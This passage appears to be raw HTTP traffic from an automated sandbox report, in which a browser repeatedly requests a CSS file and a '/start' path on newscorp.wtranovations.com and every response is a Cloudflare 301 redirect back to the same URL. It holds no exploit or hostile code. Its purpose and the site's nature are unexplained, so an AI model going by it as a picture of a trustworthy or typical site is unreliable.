                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:12 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 6
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23e2bb013dd2-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129140&min_rtt=129048&rtt_var=27363&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=31217&cwnd=252&unsent_bytes=0&cid=e449ea7db27e55c6&ts=329&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      38192.168.11.1249414104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:12 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC1203INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:13 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:13 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijgHVFkh4vymtgwd3ODWOBaTSYvygtTx%2FXH1CmQfrsoCwr1ae5Ah6TlNaS9vO6WQTtEmTAzi%2BjNHQLvSUyvGbp%2Bm900JAXcUW4FVK5fvxTbDxVhv6kah8162XgiS8U%2BikFdcF1pVI%2BizH2gpzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=54&min_rtt=53&rtt_var=17&sent=3&recv=7&lost=0&retrans=0&sent_bytes=2352&recv_bytes=1909&delivery_rate=1190600000&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23e56c174972-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=132615&min_rtt=132555&rtt_var=28052&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=991&delivery_rate=30419&cwnd=252&unsent_bytes=0&cid=2206ad414231c0c9&ts=484&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC166INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></ht
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC7INData Raw: 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: ml>
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      39192.168.11.1249415104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC958INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:13 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      Server-Timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      Cf-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 7
                                                                                                                                                                                                                      CF-RAY: 923e23e67ae931ce-MIA
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC178INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      40192.168.11.1249416104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC1193INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:13 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:13 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdm0LGmMBQkgbsiagNVLIjdG9LvsQ5bBJfvODnj7Q6%2Bf9JTTY02QgvqDpSQZwYUeT1zPZDKZV%2Borx%2FBwr5iXaDvNxr0gRZ%2F9fK%2Fx%2FheU1SX1nn0AdKyROlado%2FyVshtW8arH7A7Yw2EFwI1u3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=40&min_rtt=40&rtt_var=20&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=608&delivery_rate=0&cwnd=99&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23ea1e3ded31-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=129293&min_rtt=129187&rtt_var=27358&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=991&delivery_rate=31255&cwnd=252&unsent_bytes=0&cid=bab7a6ed71931f21&ts=328&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      41192.168.11.1249417104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:13 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:13 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 7
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23ea5ee6dafd-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=134153&min_rtt=134094&rtt_var=28375&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=948&delivery_rate=30072&cwnd=252&unsent_bytes=0&cid=fd3fe4fd1e4ecebf&ts=336&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      42192.168.11.1249418104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC1197INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:14 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:14 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMIeUq7rRPFMat5sZIYKgyN3b2ZR3Gse8XxxPLx%2BMysU09l3883%2B8Pb48ZQGx65vWi2gzdeLUvp21mVQmYtWHhxIoTxT92HVTuZSOLdPimqKkM03fEftxVZA9iLA88IrrEP3O7Mf3HAPQPCQpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=76&min_rtt=62&rtt_var=23&sent=4&recv=9&lost=0&retrans=0&sent_bytes=3479&recv_bytes=2493&delivery_rate=1056177419&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23edcfd09ab4-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=127395&min_rtt=127359&rtt_var=26896&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=991&delivery_rate=31684&cwnd=252&unsent_bytes=0&cid=e91d81080ea5c7ff&ts=322&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC172INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC6INData Raw: 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      43192.168.11.1249419104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC370OUTGET /statsic/css/main.output.css HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC1175INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:14 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=14400
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:06 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/statsic/css/main.output.css
                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uJCn5ZV0AZj3H3oSusErPqZ3NBMar0L%2FQM2m68W%2F070W5doQOXHdJlUzfSxnomowJvgbcHOoxHYqgdPqzFkITsPmhx87C8rydg6XzPpCbRuLY2xyQrxpxVQwcMEqWcX1rLAQZnuhur9w3P9xqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=44&min_rtt=44&rtt_var=22&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=663&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                                                      Age: 8
                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                      CF-RAY: 923e23ee1e3fda2b-MIA
                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=131609&min_rtt=127199&rtt_var=33465&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=948&delivery_rate=28716&cwnd=252&unsent_bytes=0&cid=0e93e71613a961ed&ts=339&x=0"
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC173INData Raw: 61 37 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: a7<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      44192.168.11.1249420104.21.59.250443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2025-03-21 14:29:14 UTC413OUTGET /ad083999f1/start?for=/edzxesfee/d205afd3/ HTTP/1.1
                                                                                                                                                                                                                      Host: newscorp.wtranovations.com
                                                                                                                                                                                                                      Origin: https://newscorp.wtranovations.com
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15
                                                                                                                                                                                                                      Accept-Language: en-gb
                                                                                                                                                                                                                      Referer: https://newscorp.wtranovations.com/
                                                                                                                                                                                                                      Accept-Encoding: br, gzip, deflate
                                                                                                                                                                                                                      2025-03-21 14:29:15 UTC981INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                      Date: Fri, 21 Mar 2025 14:29:15 GMT
                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: max-age=3600
                                                                                                                                                                                                                      Expires: Fri, 21 Mar 2025 15:29:15 GMT
                                                                                                                                                                                                                      Location: https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/
